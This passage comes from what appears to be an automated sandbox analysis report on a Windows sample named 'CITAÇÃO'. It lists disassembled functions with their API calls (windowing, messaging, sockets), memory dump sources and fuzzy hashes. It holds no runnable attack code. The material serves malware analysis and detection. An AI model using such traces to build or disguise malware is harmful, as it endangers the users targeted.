                                                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                      Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 004503C8
                                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Proc$Parent
                                                      • String ID:
                                                      • API String ID: 2351499541-0
                                                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                      Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                      • TranslateMessage.USER32(?), ref: 00442B01
                                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchTranslate
                                                      • String ID:
                                                      • API String ID: 1795658109-0
                                                      • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                      • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                      • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                      • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                      Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                      • GetCaretPos.USER32(?), ref: 004743B2
                                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                      • GetForegroundWindow.USER32 ref: 004743EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                      • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                      • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                      • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                      Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                      • _wcslen.LIBCMT ref: 00449519
                                                      • _wcslen.LIBCMT ref: 00449526
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend_wcslen$_wcspbrk
                                                      • String ID:
                                                      • API String ID: 2886238975-0
                                                      • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                      • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                      • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                      • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                      Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __setmode$DebugOutputString_fprintf
                                                      • String ID:
                                                      • API String ID: 1792727568-0
                                                      • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                      • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                      • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                      • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                      Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                      • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                      • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                      • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                      Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                      • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                      • String ID: cdecl
                                                      • API String ID: 3850814276-3896280584
                                                      • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                      • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                      • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                      • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                      Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                      • _memmove.LIBCMT ref: 0046D475
                                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 2502553879-0
                                                      • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                      • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                      • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                      • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                      Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32 ref: 00448C69
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                      • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                      • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                      • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                      Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastacceptselect
                                                      • String ID:
                                                      • API String ID: 385091864-0
                                                      • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                      • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                      • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                      • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                      Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                      • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                      • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                      • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                      Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                      • GetStockObject.GDI32(00000011), ref: 00430258
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateMessageObjectSendShowStock
                                                      • String ID:
                                                      • API String ID: 1358664141-0
                                                      • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                      • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                      • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                      • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                      Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                      • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                      • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                      • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                      • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                      Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                      • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                      • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                      • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                      • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                      • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
